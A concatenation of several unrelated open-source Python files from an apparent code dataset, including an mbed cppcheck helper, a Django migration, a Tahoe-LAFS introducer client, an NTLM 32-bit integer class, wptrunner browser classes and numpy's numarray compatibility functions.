incdirs = toolchain.scan_resources(BUILD_TARGET)
target_includes = ["-I%s" % i for i in incdirs.inc_dirs]
target_includes.append("-I%s"% str(BUILD_TARGET))
target_includes.append("-I%s"% str(HAL_SRC))
target_c_sources = " ".join(incdirs.c_sources)
target_cpp_sources = " ".join(incdirs.cpp_sources)
target_macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]
# Common Sources
mbed_resources = toolchain.scan_resources(MBED_COMMON)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
mbed_includes = ["-I%s" % i for i in mbed_resources.inc_dirs]
mbed_includes.append("-I%s"% str(BUILD_TARGET))
mbed_includes.append("-I%s"% str(MBED_COMMON))
mbed_includes.append("-I%s"% str(MBED_API))
mbed_includes.append("-I%s"% str(MBED_HAL))
mbed_c_sources = " ".join(mbed_resources.c_sources)
mbed_cpp_sources = " ".join(mbed_resources.cpp_sources)
target_includes = map(str.strip, target_includes)
mbed_includes = map(str.strip, mbed_includes)
target_macros = map(str.strip, target_macros)
check_cmd = CPPCHECK_CMD
check_cmd += CPPCHECK_MSG_FORMAT
check_cmd += target_includes
check_cmd += mbed_includes
check_cmd += target_macros
    # We need to pass some parameters via file to avoid "command line too long" errors in some OSs
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in target_c_sources.split())
tmp_file.writelines(line + '\n' for line in target_cpp_sources.split())
tmp_file.writelines(line + '\n' for line in mbed_c_sources.split())
tmp_file.writelines(line + '\n' for line in mbed_cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
_stdout, _stderr, _rc = run_cmd_ext(check_cmd)
if verbose:
print _stdout
print _stderr
def static_analysis_scan_lib(lib_id, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
static_analysis_scan_library(lib.source_dir, lib.build_dir, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
lib.dependencies, options,
verbose=verbose, clean=clean, macros=macros, notify=notify, jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s'% (lib_id, target.name, toolchain)
def static_analysis_scan_library(src_paths, build_path, target, toolchain_name, cppcheck_cmd, cppcheck_msg_format,
dependencies_paths=None, options=None, name=None, clean=False,
notify=None, verbose=False, macros=None, jobs=1):
""" Function scans library (or just some set of sources/headers) for staticly detectable defects """
if type(src_paths) != ListType:
src_paths = [src_paths]
for src_path in src_paths:
if not exists(src_path):
raise Exception("The library source folder does not exist: %s", src_path)
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
# The first path will give the name to the library
name = basename(src_paths[0])
toolchain.info("Static analysis for library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
# Create the desired build directory structure
bin_path = join(build_path, toolchain.obj_path)
mkdir(bin_path)
tmp_path = join(build_path, '.temp', toolchain.obj_path)
mkdir(tmp_path)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
includes = ["-I%s" % i for i in dependencies_include_dir + src_paths]
c_sources = " "
cpp_sources = " "
macros = ['-D%s' % s for s in toolchain.get_symbols() + toolchain.macros]
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
includes += ["-I%s" % i for i in resource.inc_dirs]
c_sources += " ".join(resource.c_sources) + " "
cpp_sources += " ".join(resource.cpp_sources) + " "
dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)
includes = map(str.strip, includes)
macros = map(str.strip, macros)
check_cmd = cppcheck_cmd
check_cmd += cppcheck_msg_format
check_cmd += includes
check_cmd += macros
# We need to pass some parameters via file to avoid "command line too long in some OSs"
# Temporary file is created to store e.g. cppcheck list of files for command line
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in c_sources.split())
tmp_file.writelines(line + '\n' for line in cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
# This will allow us to grab result from both stdio and stderr outputs (so we can show them)
# We assume static code analysis tool is outputting defects on STDERR
_stdout, _stderr, _rc = run_cmd_ext(check_cmd)
if verbose:
print _stdout
print _stderr
def print_build_results(result_list, build_name):
""" Generate result string for build results """
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
def write_build_report(build_report, template_filename, filename):
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as f:
f.write(template.render(failing_builds=build_report_failing, passing_builds=build_report_passing))
| apache-2.0 | 8,446,815,926,178,976,000 | 40.190909 | 160 | 0.675127 | false |
iannesbitt/iannesbitt.org | main/migrations/0001_initial.py | 1 | 1118 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-24 03:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.CharField(max_length=500)),
('url', models.URLField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| mpl-2.0 | -5,663,240,715,749,562,000 | 33.9375 | 120 | 0.620751 | false |
sspreitzer/tahoe-lafs | src/allmydata/introducer/client.py | 6 | 16218 |
import time
from zope.interface import implements
from twisted.application import service
from foolscap.api import Referenceable, eventually, RemoteInterface
from allmydata.interfaces import InsufficientVersionError
from allmydata.introducer.interfaces import IIntroducerClient, \
RIIntroducerSubscriberClient_v1, RIIntroducerSubscriberClient_v2
from allmydata.introducer.common import sign_to_foolscap, unsign_from_foolscap,\
convert_announcement_v1_to_v2, convert_announcement_v2_to_v1, \
make_index, get_tubid_string_from_ann, get_tubid_string
from allmydata.util import log
from allmydata.util.rrefutil import add_version_to_remote_reference
from allmydata.util.keyutil import BadSignatureError
class WrapV2ClientInV1Interface(Referenceable): # for_v1
"""I wrap a v2 IntroducerClient to make it look like a v1 client, so it
can be attached to an old server."""
implements(RIIntroducerSubscriberClient_v1)
def __init__(self, original):
self.original = original
def remote_announce(self, announcements):
lp = self.original.log("received %d announcements (v1)" %
len(announcements))
anns_v1 = set([convert_announcement_v1_to_v2(ann_v1)
for ann_v1 in announcements])
return self.original.got_announcements(anns_v1, lp)
def remote_set_encoding_parameters(self, parameters):
self.original.remote_set_encoding_parameters(parameters)
class RIStubClient(RemoteInterface): # for_v1
"""Each client publishes a service announcement for a dummy object called
the StubClient. This object doesn't actually offer any services, but the
announcement helps the Introducer keep track of which clients are
subscribed (so the grid admin can keep track of things like the size of
    the grid and the client versions in use). This is the (empty)
RemoteInterface for the StubClient."""
class StubClient(Referenceable): # for_v1
implements(RIStubClient)
V1 = "http://allmydata.org/tahoe/protocols/introducer/v1"
V2 = "http://allmydata.org/tahoe/protocols/introducer/v2"
class IntroducerClient(service.Service, Referenceable):
implements(RIIntroducerSubscriberClient_v2, IIntroducerClient)
def __init__(self, tub, introducer_furl,
nickname, my_version, oldest_supported,
app_versions, sequencer):
self._tub = tub
self.introducer_furl = introducer_furl
assert type(nickname) is unicode
self._nickname = nickname
self._my_version = my_version
self._oldest_supported = oldest_supported
self._app_versions = app_versions
self._sequencer = sequencer
self._my_subscriber_info = { "version": 0,
"nickname": self._nickname,
"app-versions": self._app_versions,
"my-version": self._my_version,
"oldest-supported": self._oldest_supported,
}
self._stub_client = None # for_v1
self._stub_client_furl = None
self._outbound_announcements = {} # not signed
self._published_announcements = {} # signed
self._canary = Referenceable()
self._publisher = None
self._local_subscribers = [] # (servicename,cb,args,kwargs) tuples
self._subscribed_service_names = set()
self._subscriptions = set() # requests we've actually sent
# _inbound_announcements remembers one announcement per
# (servicename,serverid) pair. Anything that arrives with the same
# pair will displace the previous one. This stores tuples of
# (unpacked announcement dictionary, verifyingkey, rxtime). The ann
# dicts can be compared for equality to distinguish re-announcement
# from updates. It also provides memory for clients who subscribe
# after startup.
self._inbound_announcements = {}
self.encoding_parameters = None
# hooks for unit tests
self._debug_counts = {
"inbound_message": 0,
"inbound_announcement": 0,
"wrong_service": 0,
"duplicate_announcement": 0,
"update": 0,
"new_announcement": 0,
"outbound_message": 0,
}
self._debug_outstanding = 0
def _debug_retired(self, res):
self._debug_outstanding -= 1
return res
def startService(self):
service.Service.startService(self)
self._introducer_error = None
rc = self._tub.connectTo(self.introducer_furl, self._got_introducer)
self._introducer_reconnector = rc
def connect_failed(failure):
self.log("Initial Introducer connection failed: perhaps it's down",
level=log.WEIRD, failure=failure, umid="c5MqUQ")
d = self._tub.getReference(self.introducer_furl)
d.addErrback(connect_failed)
def _got_introducer(self, publisher):
self.log("connected to introducer, getting versions")
default = { "http://allmydata.org/tahoe/protocols/introducer/v1":
{ },
"application-version": "unknown: no get_version()",
}
d = add_version_to_remote_reference(publisher, default)
d.addCallback(self._got_versioned_introducer)
d.addErrback(self._got_error)
def _got_error(self, f):
# TODO: for the introducer, perhaps this should halt the application
self._introducer_error = f # polled by tests
def _got_versioned_introducer(self, publisher):
self.log("got introducer version: %s" % (publisher.version,))
# we require an introducer that speaks at least one of (V1, V2)
if not (V1 in publisher.version or V2 in publisher.version):
raise InsufficientVersionError("V1 or V2", publisher.version)
self._publisher = publisher
publisher.notifyOnDisconnect(self._disconnected)
self._maybe_publish()
self._maybe_subscribe()
def _disconnected(self):
self.log("bummer, we've lost our connection to the introducer")
self._publisher = None
self._subscriptions.clear()
def log(self, *args, **kwargs):
if "facility" not in kwargs:
kwargs["facility"] = "tahoe.introducer.client"
return log.msg(*args, **kwargs)
def subscribe_to(self, service_name, cb, *args, **kwargs):
self._local_subscribers.append( (service_name,cb,args,kwargs) )
self._subscribed_service_names.add(service_name)
self._maybe_subscribe()
for index,(ann,key_s,when) in self._inbound_announcements.items():
servicename = index[0]
if servicename == service_name:
eventually(cb, key_s, ann, *args, **kwargs)
def _maybe_subscribe(self):
if not self._publisher:
self.log("want to subscribe, but no introducer yet",
level=log.NOISY)
return
for service_name in self._subscribed_service_names:
if service_name in self._subscriptions:
continue
self._subscriptions.add(service_name)
if V2 in self._publisher.version:
self._debug_outstanding += 1
d = self._publisher.callRemote("subscribe_v2",
self, service_name,
self._my_subscriber_info)
d.addBoth(self._debug_retired)
else:
d = self._subscribe_handle_v1(service_name) # for_v1
d.addErrback(log.err, facility="tahoe.introducer.client",
level=log.WEIRD, umid="2uMScQ")
def _subscribe_handle_v1(self, service_name): # for_v1
# they don't speak V2: must be a v1 introducer. Fall back to the v1
# 'subscribe' method, using a client adapter.
ca = WrapV2ClientInV1Interface(self)
self._debug_outstanding += 1
d = self._publisher.callRemote("subscribe", ca, service_name)
d.addBoth(self._debug_retired)
# We must also publish an empty 'stub_client' object, so the
# introducer can count how many clients are connected and see what
# versions they're running.
if not self._stub_client_furl:
self._stub_client = sc = StubClient()
self._stub_client_furl = self._tub.registerReference(sc)
def _publish_stub_client(ignored):
furl = self._stub_client_furl
self.publish("stub_client",
{ "anonymous-storage-FURL": furl,
"permutation-seed-base32": get_tubid_string(furl),
})
d.addCallback(_publish_stub_client)
return d
def create_announcement_dict(self, service_name, ann):
ann_d = { "version": 0,
# "seqnum" and "nonce" will be populated with new values in
# publish(), each time we make a change
"nickname": self._nickname,
"app-versions": self._app_versions,
"my-version": self._my_version,
"oldest-supported": self._oldest_supported,
"service-name": service_name,
}
ann_d.update(ann)
return ann_d
def publish(self, service_name, ann, signing_key=None):
# we increment the seqnum every time we publish something new
current_seqnum, current_nonce = self._sequencer()
ann_d = self.create_announcement_dict(service_name, ann)
self._outbound_announcements[service_name] = ann_d
# publish all announcements with the new seqnum and nonce
for service_name,ann_d in self._outbound_announcements.items():
ann_d["seqnum"] = current_seqnum
ann_d["nonce"] = current_nonce
ann_t = sign_to_foolscap(ann_d, signing_key)
self._published_announcements[service_name] = ann_t
self._maybe_publish()
def _maybe_publish(self):
if not self._publisher:
self.log("want to publish, but no introducer yet", level=log.NOISY)
return
# this re-publishes everything. The Introducer ignores duplicates
for ann_t in self._published_announcements.values():
self._debug_counts["outbound_message"] += 1
if V2 in self._publisher.version:
self._debug_outstanding += 1
d = self._publisher.callRemote("publish_v2", ann_t,
self._canary)
d.addBoth(self._debug_retired)
else:
d = self._handle_v1_publisher(ann_t) # for_v1
d.addErrback(log.err, ann_t=ann_t,
facility="tahoe.introducer.client",
level=log.WEIRD, umid="xs9pVQ")
def _handle_v1_publisher(self, ann_t): # for_v1
# they don't speak V2, so fall back to the old 'publish' method
# (which takes an unsigned tuple of bytestrings)
self.log("falling back to publish_v1",
level=log.UNUSUAL, umid="9RCT1A")
ann_v1 = convert_announcement_v2_to_v1(ann_t)
self._debug_outstanding += 1
d = self._publisher.callRemote("publish", ann_v1)
d.addBoth(self._debug_retired)
return d
def remote_announce_v2(self, announcements):
lp = self.log("received %d announcements (v2)" % len(announcements))
return self.got_announcements(announcements, lp)
def got_announcements(self, announcements, lp=None):
# this is the common entry point for both v1 and v2 announcements
self._debug_counts["inbound_message"] += 1
for ann_t in announcements:
try:
# this might raise UnknownKeyError or bad-sig error
ann, key_s = unsign_from_foolscap(ann_t)
# key is "v0-base32abc123"
except BadSignatureError:
self.log("bad signature on inbound announcement: %s" % (ann_t,),
parent=lp, level=log.WEIRD, umid="ZAU15Q")
# process other announcements that arrived with the bad one
continue
self._process_announcement(ann, key_s)
def _process_announcement(self, ann, key_s):
self._debug_counts["inbound_announcement"] += 1
service_name = str(ann["service-name"])
if service_name not in self._subscribed_service_names:
self.log("announcement for a service we don't care about [%s]"
% (service_name,), level=log.UNUSUAL, umid="dIpGNA")
self._debug_counts["wrong_service"] += 1
return
# for ASCII values, simplejson might give us unicode *or* bytes
if "nickname" in ann and isinstance(ann["nickname"], str):
ann["nickname"] = unicode(ann["nickname"])
nick_s = ann.get("nickname",u"").encode("utf-8")
lp2 = self.log(format="announcement for nickname '%(nick)s', service=%(svc)s: %(ann)s",
nick=nick_s, svc=service_name, ann=ann, umid="BoKEag")
# how do we describe this node in the logs?
desc_bits = []
if key_s:
desc_bits.append("serverid=" + key_s[:20])
if "anonymous-storage-FURL" in ann:
tubid_s = get_tubid_string_from_ann(ann)
desc_bits.append("tubid=" + tubid_s[:8])
description = "/".join(desc_bits)
# the index is used to track duplicates
index = make_index(ann, key_s)
# is this announcement a duplicate?
if (index in self._inbound_announcements
and self._inbound_announcements[index][0] == ann):
self.log(format="reannouncement for [%(service)s]:%(description)s, ignoring",
service=service_name, description=description,
parent=lp2, level=log.UNUSUAL, umid="B1MIdA")
self._debug_counts["duplicate_announcement"] += 1
return
# does it update an existing one?
if index in self._inbound_announcements:
old,_,_ = self._inbound_announcements[index]
if "seqnum" in old:
# must beat previous sequence number to replace
if ("seqnum" not in ann
or not isinstance(ann["seqnum"], (int,long))):
self.log("not replacing old announcement, no valid seqnum: %s"
% (ann,),
parent=lp2, level=log.NOISY, umid="zFGH3Q")
return
if ann["seqnum"] <= old["seqnum"]:
# note that exact replays are caught earlier, by
# comparing the entire signed announcement.
self.log("not replacing old announcement, "
"new seqnum is too old (%s <= %s) "
"(replay attack?): %s"
% (ann["seqnum"], old["seqnum"], ann),
parent=lp2, level=log.UNUSUAL, umid="JAAAoQ")
return
# ok, seqnum is newer, allow replacement
self._debug_counts["update"] += 1
self.log("replacing old announcement: %s" % (ann,),
parent=lp2, level=log.NOISY, umid="wxwgIQ")
else:
self._debug_counts["new_announcement"] += 1
self.log("new announcement[%s]" % service_name,
parent=lp2, level=log.NOISY)
self._inbound_announcements[index] = (ann, key_s, time.time())
# note: we never forget an index, but we might update its value
for (service_name2,cb,args,kwargs) in self._local_subscribers:
if service_name2 == service_name:
eventually(cb, key_s, ann, *args, **kwargs)
def remote_set_encoding_parameters(self, parameters):
self.encoding_parameters = parameters
def connected_to_introducer(self):
return bool(self._publisher)
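# Rough usage sketch (an assumption -- the real wiring lives in the node setup
# code, not in this module): a node wraps its Tub in an IntroducerClient,
# subscribes to the service names it cares about and publishes its own
# announcements. The furl, nickname, announcement body and (absent) signing
# key below are placeholders.
def _example_introducer_client_usage(tub, introducer_furl, sequencer):
    ic = IntroducerClient(tub, introducer_furl, u"example-nick",
                          "1.0", "1.0", {}, sequencer)
    seen = []
    def _got_storage_announcement(key_s, ann):
        # called once per new or updated storage announcement
        seen.append((key_s, ann))
    ic.subscribe_to("storage", _got_storage_announcement)
    ic.publish("storage", {"anonymous-storage-FURL": "pb://example"})
    return ic, seen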
| gpl-2.0 | 4,940,367,147,178,672,000 | 43.925208 | 95 | 0.591072 | false |
DShokes/ArcREST | src/arcrest/packages/ntlm3/U32.py | 6 | 3652 | # This file is part of 'NTLM Authorization Proxy Server' http://sourceforge.net/projects/ntlmaps/
# Copyright 2001 Dmitry A. Rozmanov <[email protected]>
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/> or <http://www.gnu.org/licenses/lgpl.txt>.
from __future__ import division
from .. import six
C = 0x1000000000
def norm(n):
return n & 0xFFFFFFFF
class U32:
v = 0
def __init__(self, value=0):
if not isinstance(value, six.integer_types):
value = six.byte2int(value)
self.v = C + norm(abs(int(value)))
def set(self, value=0):
self.v = C + norm(abs(int(value)))
def __repr__(self):
return hex(norm(self.v))
def __long__(self):
return int(norm(self.v))
def __int__(self):
return int(norm(self.v))
def __chr__(self):
return chr(norm(self.v))
def __add__(self, b):
r = U32()
r.v = C + norm(self.v + b.v)
return r
def __sub__(self, b):
r = U32()
if self.v < b.v:
r.v = C + norm(0x100000000 - (b.v - self.v))
else:
r.v = C + norm(self.v - b.v)
return r
def __mul__(self, b):
r = U32()
r.v = C + norm(self.v * b.v)
return r
def __div__(self, b):
r = U32()
r.v = C + (norm(self.v) // norm(b.v))
return r
def __truediv__(self, b):
r = U32()
r.v = C + (norm(self.v) / norm(b.v))
return r
def __mod__(self, b):
r = U32()
r.v = C + (norm(self.v) % norm(b.v))
return r
def __neg__(self):
return U32(self.v)
def __pos__(self):
return U32(self.v)
def __abs__(self):
return U32(self.v)
def __invert__(self):
r = U32()
r.v = C + norm(~self.v)
return r
def __lshift__(self, b):
r = U32()
r.v = C + norm(self.v << b)
return r
def __rshift__(self, b):
r = U32()
r.v = C + (norm(self.v) >> b)
return r
def __and__(self, b):
r = U32()
r.v = C + norm(self.v & b.v)
return r
def __or__(self, b):
r = U32()
r.v = C + norm(self.v | b.v)
return r
def __xor__(self, b):
r = U32()
r.v = C + norm(self.v ^ b.v)
return r
def __not__(self):
return U32(not norm(self.v))
def truth(self):
return norm(self.v)
def __cmp__(self, b):
if norm(self.v) > norm(b.v):
return 1
elif norm(self.v) < norm(b.v):
return -1
else:
return 0
def __lt__(self, other):
return self.v < other.v
def __gt__(self, other):
return self.v > other.v
def __eq__(self, other):
return self.v == other.v
def __le__(self, other):
return self.v <= other.v
def __ge__(self, other):
return self.v >= other.v
def __ne__(self, other):
return self.v != other.v
def __nonzero__(self):
return norm(self.v)
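# Small illustrative demo (not part of the original module): U32 emulates
# unsigned 32-bit arithmetic with wraparound, which is what the surrounding
# NTLM hash code depends on.
def _example_u32_wraparound():
    a = U32(0xFFFFFFFF)
    b = U32(1)
    assert int(a + b) == 0           # addition wraps at 2**32
    assert int(b - a) == 2           # subtraction wraps the other way
    assert int(a >> 16) == 0xFFFF    # shifts stay within 32 bits
    return a, b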
| apache-2.0 | 2,199,663,836,172,812,800 | 22.410256 | 121 | 0.517251 | false |
pyfisch/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/browsers/base.py | 4 | 5262 | import os
import platform
import socket
from abc import ABCMeta, abstractmethod
from copy import deepcopy
from ..wptcommandline import require_arg # noqa: F401
here = os.path.split(__file__)[0]
def inherit(super_module, child_globals, product_name):
super_wptrunner = super_module.__wptrunner__
child_globals["__wptrunner__"] = child_wptrunner = deepcopy(super_wptrunner)
child_wptrunner["product"] = product_name
for k in ("check_args", "browser", "browser_kwargs", "executor_kwargs",
"env_extras", "env_options", "timeout_multiplier"):
attr = super_wptrunner[k]
child_globals[attr] = getattr(super_module, attr)
for v in super_module.__wptrunner__["executor"].values():
child_globals[v] = getattr(super_module, v)
if "run_info_extras" in super_wptrunner:
attr = super_wptrunner["run_info_extras"]
child_globals[attr] = getattr(super_module, attr)
def cmd_arg(name, value=None):
prefix = "-" if platform.system() == "Windows" else "--"
rv = prefix + name
if value is not None:
rv += "=" + value
return rv
def get_free_port():
"""Get a random unbound port"""
while True:
s = socket.socket()
try:
s.bind(("127.0.0.1", 0))
except socket.error:
continue
else:
return s.getsockname()[1]
finally:
s.close()
def get_timeout_multiplier(test_type, run_info_data, **kwargs):
if kwargs["timeout_multiplier"] is not None:
return kwargs["timeout_multiplier"]
return 1
def browser_command(binary, args, debug_info):
if debug_info:
if debug_info.requiresEscapedArgs:
args = [item.replace("&", "\\&") for item in args]
debug_args = [debug_info.path] + debug_info.args
else:
debug_args = []
command = [binary] + args
return debug_args, command
class BrowserError(Exception):
pass
class Browser(object):
__metaclass__ = ABCMeta
process_cls = None
init_timeout = 30
def __init__(self, logger):
"""Abstract class serving as the basis for Browser implementations.
The Browser is used in the TestRunnerManager to start and stop the browser
process, and to check the state of that process. This class also acts as a
context manager, enabling it to do browser-specific setup at the start of
the testrun and cleanup after the run is complete.
:param logger: Structured logger to use for output.
"""
self.logger = logger
def __enter__(self):
self.setup()
return self
def __exit__(self, *args, **kwargs):
self.cleanup()
def setup(self):
"""Used for browser-specific setup that happens at the start of a test run"""
pass
def settings(self, test):
return {}
@abstractmethod
def start(self, group_metadata, **kwargs):
"""Launch the browser object and get it into a state where is is ready to run tests"""
pass
@abstractmethod
def stop(self, force=False):
"""Stop the running browser process."""
pass
@abstractmethod
def pid(self):
"""pid of the browser process or None if there is no pid"""
pass
@abstractmethod
def is_alive(self):
"""Boolean indicating whether the browser process is still running"""
pass
def setup_ssl(self, hosts):
"""Return a certificate to use for tests requiring ssl that will be trusted by the browser"""
raise NotImplementedError("ssl testing not supported")
def cleanup(self):
"""Browser-specific cleanup that is run after the testrun is finished"""
pass
def executor_browser(self):
"""Returns the ExecutorBrowser subclass for this Browser subclass and the keyword arguments
with which it should be instantiated"""
return ExecutorBrowser, {}
def check_crash(self, process, test):
"""Check if a crash occured and output any useful information to the
log. Returns a boolean indicating whether a crash occured."""
return False
class NullBrowser(Browser):
def __init__(self, logger, **kwargs):
super(NullBrowser, self).__init__(logger)
def start(self, **kwargs):
"""No-op browser to use in scenarios where the TestRunnerManager shouldn't
actually own the browser process (e.g. Servo where we start one browser
per test)"""
pass
def stop(self, force=False):
pass
def pid(self):
return None
def is_alive(self):
return True
def on_output(self, line):
raise NotImplementedError
class ExecutorBrowser(object):
def __init__(self, **kwargs):
"""View of the Browser used by the Executor object.
This is needed because the Executor runs in a child process and
we can't ship Browser instances between processes on Windows.
Typically this will have a few product-specific properties set,
but in some cases it may have more elaborate methods for setting
up the browser from the runner process.
"""
for k, v in kwargs.iteritems():
setattr(self, k, v)
| mpl-2.0 | -1,312,770,853,328,141,800 | 28.071823 | 101 | 0.629038 | false |
nakagami/reportlab | src/reportlab/graphics/samples/runall.py | 1 | 1969 | # runs all the GUIedit charts in this directory -
# makes a PDF sample for each existing chart type
import sys
import glob
import inspect
import types
def moduleClasses(mod):
def P(obj, m=mod.__name__, CT=types.ClassType):
return (type(obj)==CT and obj.__module__==m)
try:
return inspect.getmembers(mod, P)[0][1]
except:
return None
def getclass(f):
return moduleClasses(__import__(f))
def run(format, VERBOSE=0):
formats = format.split(',')
for i in range(0, len(formats)):
        formats[i] = formats[i].strip().lower()  # normalize each requested format name
allfiles = glob.glob('*.py')
allfiles.sort()
for fn in allfiles:
f = fn.split('.')[0]
c = getclass(f)
if c != None:
print c.__name__
try:
for fmt in formats:
if fmt:
c().save(formats=[fmt],outDir='.',fnRoot=c.__name__)
if VERBOSE:
print " %s.%s" % (c.__name__, fmt)
except:
print " COULDN'T CREATE '%s.%s'!" % (c.__name__, format)
if __name__ == "__main__":
if len(sys.argv) == 1:
run('pdf,pict,png')
else:
try:
if sys.argv[1] == "-h":
print 'usage: runall.py [FORMAT] [-h]'
                print ' if format is supplied it should be one or more of pdf,gif,eps,png etc'
print ' if format is missing the following formats are assumed: pdf,pict,png'
print ' -h prints this message'
else:
t = sys.argv[1:]
for f in t:
run(f)
except:
print 'usage: runall.py [FORMAT][-h]'
            print ' if format is supplied it should be one or more of pdf,gif,eps,png etc'
print ' if format is missing the following formats are assumed: pdf,pict,png'
print ' -h prints this message'
raise
| bsd-3-clause | -3,195,991,860,190,270,500 | 32.948276 | 96 | 0.503809 | false |
ogrisel/numpy | numpy/numarray/functions.py | 13 | 15986 | from __future__ import division, absolute_import, print_function
# missing Numarray defined names (in from numarray import *)
__all__ = ['asarray', 'ones', 'zeros', 'array', 'where']
__all__ += ['vdot', 'dot', 'matrixmultiply', 'ravel', 'indices',
'arange', 'concatenate', 'all', 'allclose', 'alltrue', 'and_',
'any', 'argmax', 'argmin', 'argsort', 'around', 'array_equal',
'array_equiv', 'arrayrange', 'array_str', 'array_repr',
'array2list', 'average', 'choose', 'CLIP', 'RAISE', 'WRAP',
'clip', 'compress', 'copy', 'copy_reg',
'diagonal', 'divide_remainder', 'e', 'explicit_type', 'pi',
'flush_caches', 'fromfile', 'os', 'sys', 'STRICT',
'SLOPPY', 'WARN', 'EarlyEOFError', 'SizeMismatchError',
'SizeMismatchWarning', 'FileSeekWarning', 'fromstring',
'fromfunction', 'fromlist', 'getShape', 'getTypeObject',
'identity', 'info', 'innerproduct', 'inputarray',
'isBigEndian', 'kroneckerproduct', 'lexsort', 'math',
'operator', 'outerproduct', 'put', 'putmask', 'rank',
'repeat', 'reshape', 'resize', 'round', 'searchsorted',
'shape', 'size', 'sometrue', 'sort', 'swapaxes', 'take',
'tcode', 'tname', 'tensormultiply', 'trace', 'transpose',
'types', 'value', 'cumsum', 'cumproduct', 'nonzero', 'newobj',
'togglebyteorder'
]
import copy
import types
import os
import sys
import math
import operator
import numpy as np
from numpy import dot as matrixmultiply, dot, vdot, ravel, concatenate, all,\
allclose, any, argsort, array_equal, array_equiv,\
array_str, array_repr, CLIP, RAISE, WRAP, clip, concatenate, \
diagonal, e, pi, inner as innerproduct, nonzero, \
outer as outerproduct, kron as kroneckerproduct, lexsort, putmask, rank, \
resize, searchsorted, shape, size, sort, swapaxes, trace, transpose
from numpy.compat import long
from .numerictypes import typefrom
if sys.version_info[0] >= 3:
import copyreg as copy_reg
else:
import copy_reg
isBigEndian = sys.byteorder != 'little'
value = tcode = 'f'
tname = 'Float32'
# If dtype is not None, then it is used
# If type is not None, then it is used
# If typecode is not None then it is used
# If use_default is True, then the default
# data-type is returned if all are None
def type2dtype(typecode, type, dtype, use_default=True):
if dtype is None:
if type is None:
if use_default or typecode is not None:
dtype = np.dtype(typecode)
else:
dtype = np.dtype(type)
if use_default and dtype is None:
dtype = np.dtype('int')
return dtype
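# Brief illustration (an added sketch, not original numarray code) of the
# precedence implemented above: an explicit dtype argument wins over type,
# which in turn wins over typecode.
def _example_type2dtype_precedence():
    assert type2dtype('f', None, None) == np.dtype('f')
    assert type2dtype('f', np.float64, None) == np.dtype(np.float64)
    assert type2dtype('f', np.float64, np.dtype('int16')) == np.dtype('int16')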
def fromfunction(shape, dimensions, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 1)
return np.fromfunction(shape, dimensions, dtype=dtype)
def ones(shape, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 1)
return np.ones(shape, dtype)
def zeros(shape, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 1)
return np.zeros(shape, dtype)
def where(condition, x=None, y=None, out=None):
if x is None and y is None:
arr = np.where(condition)
else:
arr = np.where(condition, x, y)
if out is not None:
out[...] = arr
return out
return arr
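# Tiny illustration (an added sketch, not original numarray code): the numarray
# signature accepts an optional output array, which this wrapper fills in place
# when provided.
def _example_where_with_out():
    cond = np.array([True, False, True])
    out = np.zeros(3, dtype=int)
    where(cond, 1, 0, out=out)   # out becomes array([1, 0, 1])
    return out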
def indices(shape, type=None):
return np.indices(shape, type)
def arange(a1, a2=None, stride=1, type=None, shape=None,
typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 0)
return np.arange(a1, a2, stride, dtype)
arrayrange = arange
def alltrue(x, axis=0):
return np.alltrue(x, axis)
def and_(a, b):
"""Same as a & b
"""
return a & b
